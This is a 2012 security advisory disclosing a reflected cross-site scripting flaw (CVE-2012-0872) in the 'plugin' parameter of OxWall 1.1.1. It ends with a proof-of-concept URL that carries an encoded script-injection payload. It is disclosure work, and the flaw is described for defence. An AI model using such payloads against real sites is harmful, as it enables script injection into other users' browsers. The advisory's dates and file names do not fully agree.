# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 2/2/2012

# previous CVE-2012-0872

============ { Ariko-Security - Advisory #2/2/2012 } =============

OxWall Cross-site scripting (XSS)

CVE-2012-0872

Vendor's description of software and download:
# Oxwall Foundation http://www.oxwall.org/

Dork:
# N/a

Application Info:
#OxWall 1.1.1

Vulnerability Info:
# Type: XSS

Time Table:
# 13/02/2012 - Vendor notified

XSS:
#Input passed to the "plugin" parameter in index.php is not properly sanitised before being returned to the user.

Solution:
# Input validation of vulnerable parameters should be corrected.

POC:

http://site/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E

Credit:
# Discoverd By: Ariko-Security 2012